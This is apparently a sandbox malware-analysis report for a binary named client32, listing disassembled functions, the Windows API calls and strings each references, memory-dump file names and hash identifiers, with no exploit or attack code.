RegisterClassA.USER32(111E9674), ref: 1105D1F2

Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9

CreateWindowExA.USER32(00000000,NSMCobrProxy,11190240,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1105D233
SetPropA.USER32(?,NSMCobrProxy,00000000), ref: 1105D2BD
GetMessageA.USER32(00000000,?,00000000,00000000), ref: 1105D2E0
TranslateMessage.USER32(?), ref: 1105D2F6
DispatchMessageA.USER32(?), ref: 1105D2FC

Strings

CobrowseProxy.cpp, xrefs: 1105D204, 1105D245
m_hAppWin, xrefs: 1105D24A
NSMCobrProxy, xrefs: 1105D1E8, 1105D22C, 1105D2B7
CobrowseProxy::RunCobrowse, xrefs: 1105D1BA
_bOK, xrefs: 1105D209

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Message$ClassCreateDispatchErrorExitLastProcessPropRegisterTranslateWindowwsprintf
String ID: CobrowseProxy.cpp$CobrowseProxy::RunCobrowse$NSMCobrProxy$_bOK$m_hAppWin
API String ID: 13347155-1383313024
Opcode ID: 37c3c3e8957f14a7e3b355c897228082546cf523f8d38056e85fd5e1210056e5
Instruction ID: 0f733430d951bad01d0579ae861b00247f75b5e4436af6dec06e8f89504007ad
Opcode Fuzzy Hash: 37c3c3e8957f14a7e3b355c897228082546cf523f8d38056e85fd5e1210056e5
Instruction Fuzzy Hash: 3341F1B5E0074AABD761DFA5CC84F9FFBA5AB44758F10842AF91697280EA30E440CB61

Function 110290F0 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 97windowCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?), ref: 1102910C

Part of subcall function 11140450: GetTickCount.KERNEL32 ref: 111404B8

wsprintfA.USER32 ref: 11029157
MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
ExitProcess.KERNEL32 ref: 110291A9
_strrchr.LIBCMT ref: 110291E5
ExitProcess.KERNEL32 ref: 11029224

Strings

Client32, xrefs: 11029185
Assert. File %hs, line %d, err %d, Expr %s, xrefs: 11029126
V12.10F4, xrefs: 11029143
Assert failed, file %hs, line %d, error code %dBuild: %hsExpression: %s, xrefs: 11029151
Info. assert, restarting..., xrefs: 1102920D

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ExitProcess$CountErrorLastMessageTick_strrchrwsprintf
String ID: Assert failed, file %hs, line %d, error code %dBuild: %hsExpression: %s$Assert. File %hs, line %d, err %d, Expr %s$Client32$Info. assert, restarting...$V12.10F4
API String ID: 2763122592-3703414834
Opcode ID: 46b0b576eeee1707cfa4597fddd227d26b12d5d0a7ecbe0e050bda6c28fca704
Instruction ID: 0c35b4c0934c547b9efc755c54c54cf2bc7aea1eab2dc2738ce497f42af58575
Opcode Fuzzy Hash: 46b0b576eeee1707cfa4597fddd227d26b12d5d0a7ecbe0e050bda6c28fca704
Instruction Fuzzy Hash: 8D310B75A0122AAFE711DFE5CCC5FBAB7A9EB4470CF104028F72587281E670A940CB61

Function 1100D570 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 80processCOMMON

Download Yara Rule

APIs

Part of subcall function 110EBBE0: LocalAlloc.KERNEL32(00000040,00000014,?,1100D58F,?), ref: 110EBBF0
Part of subcall function 110EBBE0: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,1100D58F,?), ref: 110EBC02
Part of subcall function 110EBBE0: SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000,?,1100D58F,?), ref: 110EBC14

CreateEventA.KERNEL32(?,00000000,00000000,00000000), ref: 1100D5A7
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1100D5C0
_strrchr.LIBCMT ref: 1100D5CF
GetCurrentProcessId.KERNEL32 ref: 1100D5DF
wsprintfA.USER32 ref: 1100D600
_memset.LIBCMT ref: 1100D611
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,04000000,00000000,00000000,?,?), ref: 1100D649
CloseHandle.KERNEL32(?,00000000), ref: 1100D661
CloseHandle.KERNEL32(?), ref: 1100D66A

Strings

D, xrefs: 1100D63F
%sNSSilence.exe %u %u, xrefs: 1100D5FA

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CloseCreateDescriptorHandleProcessSecurity$AllocCurrentDaclEventFileInitializeLocalModuleName_memset_strrchrwsprintf
String ID: %sNSSilence.exe %u %u$D
API String ID: 1760462761-4146734959
Opcode ID: 8e94b261c6efca61078e1c150cf0d839bc558289722da67addac1a9607ec9e4e
Instruction ID: a456dda971beae3ede1202bfd149c5043837a25f7bf8d7d11396327520b54e87
Opcode Fuzzy Hash: 8e94b261c6efca61078e1c150cf0d839bc558289722da67addac1a9607ec9e4e
Instruction Fuzzy Hash: EE218675E41329ABEB60DBE4CC89FDEB77C9B04708F108195F719A71C0DAB0AA448F65

Function 110CF6C0 Relevance: 18.3, APIs: 12, Instructions: 295sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 110CF280: std::_Xinvalid_argument.LIBCPMT ref: 110CF2A0
Part of subcall function 110CF280: _memmove.LIBCMT ref: 110CF327
Part of subcall function 110CF280: _memmove.LIBCMT ref: 110CF34B

std::exception::exception.LIBCMT ref: 110CF736

Part of subcall function 1115E96A: std::exception::_Copy_str.LIBCMT ref: 1115E985

__CxxThrowException@8.LIBCMT ref: 110CF74B

Part of subcall function 1115EDC1: RaiseException.KERNEL32(?,?,1110D0E4,?,?,?,?,?,1110D0E4,?,111C7D70), ref: 1115EE03

__strdup.LIBCMT ref: 110CF78C
_free.LIBCMT ref: 110CF88E

Part of subcall function 110CE440: __strdup.LIBCMT ref: 110CE45A

std::exception::exception.LIBCMT ref: 110CF8B6
__CxxThrowException@8.LIBCMT ref: 110CF8CB
EnterCriticalSection.KERNEL32(?,CF3D35D0,00000000,?,?), ref: 110CF917

Part of subcall function 110CF280: _memmove.LIBCMT ref: 110CF385
Part of subcall function 110CF280: _memmove.LIBCMT ref: 110CF3A1

LeaveCriticalSection.KERNEL32(?,?,00000004,00000010,00000000), ref: 110CF97D
Sleep.KERNEL32(00000064,?,00000004,00000010,00000000), ref: 110CF985
EnterCriticalSection.KERNEL32(?,?,00000004,00000010,00000000), ref: 110CF98C
LeaveCriticalSection.KERNEL32(?), ref: 110CF998
LeaveCriticalSection.KERNEL32(?,?,00000004,00000010,00000000), ref: 110CF9AC

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$_memmove$Leave$EnterException@8Throw__strdupstd::exception::exception$Copy_strExceptionRaiseSleepXinvalid_argument_freestd::_std::exception::_
String ID:
API String ID: 3280418535-0
Opcode ID: 68b1d521774598300eb67e6a48ea6106878fbd27307a7bffc243c8d3fbc295ff
Instruction ID: 0426b119ea58509990715458ea67a1d8e0eb19b48a36f056caa7348ff1c3dc90
Opcode Fuzzy Hash: 68b1d521774598300eb67e6a48ea6106878fbd27307a7bffc243c8d3fbc295ff
Instruction Fuzzy Hash: 23A17F76900619AFDB11CFA4C880BAEF7F9FF48B14F10456DE95697680D770B904CBA2

Function 110A75B0 Relevance: 18.1, APIs: 12, Instructions: 117windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 110A75D6
CreateCompatibleDC.GDI32(00000000), ref: 110A75E2
GetRgnBox.GDI32(?,?), ref: 110A7603
CreateCompatibleBitmap.GDI32(?,?,?), ref: 110A7622
SelectObject.GDI32(00000000,00000000), ref: 110A7638
BitBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,00FF0062), ref: 110A7667
OffsetRgn.GDI32(00000000,?,?), ref: 110A7682
SelectClipRgn.GDI32(00000000,00000000), ref: 110A7693
BitBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,00CC0020), ref: 110A76B3
SelectObject.GDI32(00000000,?), ref: 110A76BE
DeleteDC.GDI32(00000000), ref: 110A76C5
ReleaseDC.USER32(00000000,00000000), ref: 110A76D1

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Select$CompatibleCreateObject$BitmapClipDeleteOffsetRelease
String ID:
API String ID: 1998184411-0
Opcode ID: ca1efe98171b5a85fa15818eb71c06998636f57872ca048fd57581ab3a04e152
Instruction ID: d01220f1ca20b58af6d54b71fb89cfd4fca4eb7da2e1d7c7476d03a363cea98d
Opcode Fuzzy Hash: ca1efe98171b5a85fa15818eb71c06998636f57872ca048fd57581ab3a04e152
Instruction Fuzzy Hash: C841EA75A00616AFD715CFA8C889EBFBBB9FB8C705F108559FA15A3244CB35AC01CB61

Function 110CD730 Relevance: 18.1, APIs: 12, Instructions: 113windowCOMMON

Download Yara Rule

APIs

GetStretchBltMode.GDI32(?,?,?,1101C9E1,?,00000002,?), ref: 110CD768
SetStretchBltMode.GDI32(?,00000004), ref: 110CD776
GetDC.USER32(00000000), ref: 110CD77E
CreateCompatibleDC.GDI32(00000000), ref: 110CD787
CreateCompatibleBitmap.GDI32(00000000,00000280,000001E0), ref: 110CD79A
SelectObject.GDI32(00000000,00000000), ref: 110CD7A5
StretchBlt.GDI32(?,?,?,00000000,?,00000000,00000000,00000000,00000280,000001E0,00CC0020), ref: 110CD80C
SelectObject.GDI32(00000000,1101C9E1), ref: 110CD817
DeleteObject.GDI32(?), ref: 110CD821
DeleteDC.GDI32(00000000), ref: 110CD828
ReleaseDC.USER32(00000000,00000000), ref: 110CD831
SetStretchBltMode.GDI32(?,?), ref: 110CD83E

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Stretch$ModeObject$CompatibleCreateDeleteSelect$BitmapRelease
String ID:
API String ID: 3869104054-0
Opcode ID: 4cd5c15a1307939a7bc44611b11280addb4b9eea335058283b3b6782dfa3e116
Instruction ID: 9115cb6fd31e605d31799654545640bcc5eda688478f30b87190566900b2352f
Opcode Fuzzy Hash: 4cd5c15a1307939a7bc44611b11280addb4b9eea335058283b3b6782dfa3e116
Instruction Fuzzy Hash: BD310BB5600215AFD700DFA8CC89FAEB7B9EF8D705F208159FA15DB294D670AD01CBA1

Function 1113B200 Relevance: 17.8, APIs: 7, Strings: 3, Instructions: 252COMMON

Download Yara Rule

APIs

Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
Part of subcall function 1110C420: _memset.LIBCMT ref: 1110C477

std::exception::exception.LIBCMT ref: 1113B29B
__CxxThrowException@8.LIBCMT ref: 1113B2B0
SetPropA.USER32(?,?,00000000), ref: 1113B33E
GetPropA.USER32(?), ref: 1113B34D
wsprintfA.USER32 ref: 1113B37F
RemovePropA.USER32(?), ref: 1113B3B1

Strings

UI.CPP, xrefs: 1113B301, 1113B322, 1113B392
hWnd=%x, uiMsg=x%x, wP=x%x, lP=x%x, xrefs: 1113B379
NSMStatsWindow::m_aProp, xrefs: 1113B327

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Prop$wsprintf$Exception@8RemoveThrow_memsetstd::exception::exception
String ID: NSMStatsWindow::m_aProp$UI.CPP$hWnd=%x, uiMsg=x%x, wP=x%x, lP=x%x
API String ID: 1006086998-1590351400
Opcode ID: e80bc59964b50164fd05165775aa6cd928dd734280def06f5c21c77cfc7c1a8b
Instruction ID: 61aa09a3932057afedc91f8550a7d54e25a2d8e58743395c812a8a85ab32a301
Opcode Fuzzy Hash: e80bc59964b50164fd05165775aa6cd928dd734280def06f5c21c77cfc7c1a8b
Instruction Fuzzy Hash: AA71E975E112299FD710CFA9DD80BAEF7B8FB88325F40456FE90AD7244D634A900CBA5

Function 110396D0 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 209COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 11039715
_strncpy.LIBCMT ref: 110398A1

Strings

UserNames, xrefs: 110397D9
Client, xrefs: 11039791
SecurityKey, xrefs: 110397AD
ValidAddresses., xrefs: 11039807
SecurityKey2, xrefs: 110397C3
Password, xrefs: 1103981D
UseNTSecurity, xrefs: 110397EF

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _memset_strncpy
String ID: Client$Password$SecurityKey$SecurityKey2$UseNTSecurity$UserNames$ValidAddresses.
API String ID: 3140232205-3737366314
Opcode ID: ed420cbb560274f75d84ebc06b96006c6122c07f5a829a5636bd0a3e4249df94
Instruction ID: dbc58d1d8d77690b47793db5a2b7975178aecb486e6a1ff6e0bfb01e9f98f0eb
Opcode Fuzzy Hash: ed420cbb560274f75d84ebc06b96006c6122c07f5a829a5636bd0a3e4249df94
Instruction Fuzzy Hash: 5371C575E0021A9FC711CF28DC90BDAB7A8BF55308F1485A4E99997241EB71FA48CBD0

Function 110677D0 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 167COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 1106790C
_strncpy.LIBCMT ref: 1106794B
_strncpy.LIBCMT ref: 11067968

Strings

NULL, xrefs: 110678E6
IsMemberChannel(%s, %s) returned %s, xrefs: 11067998
FALSE, xrefs: 11067987, 1106798C
TRUE, xrefs: 1106797E

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _strncpy$_memset
String ID: FALSE$IsMemberChannel(%s, %s) returned %s$NULL$TRUE
API String ID: 2875120685-410041408
Opcode ID: 93cb466ca054f6579dea6236792d90c22abb596990d0e4c8b1ca181f33a8b502
Instruction ID: 3f557e5b11c70b586fef0777eaeab85b12f559261d3a1f9d6206d3e20be75dac
Opcode Fuzzy Hash: 93cb466ca054f6579dea6236792d90c22abb596990d0e4c8b1ca181f33a8b502
Instruction Fuzzy Hash: 3351C3B1D442699FEB51CFA89D407EEFBF8AF45204F4440E9EA48A7241F7309A44CB95

Function 110FD040 Relevance: 17.7, APIs: 4, Strings: 6, Instructions: 155threadCOMMON

Download Yara Rule

APIs

Part of subcall function 1105D340: __wcstoi64.LIBCMT ref: 1105D37D

GetLastError.KERNEL32(Client,00000000,00000001,00000000), ref: 110FD146
GetCurrentThreadId.KERNEL32 ref: 110FD17C
GetCurrentThreadId.KERNEL32 ref: 110FD18A

Strings

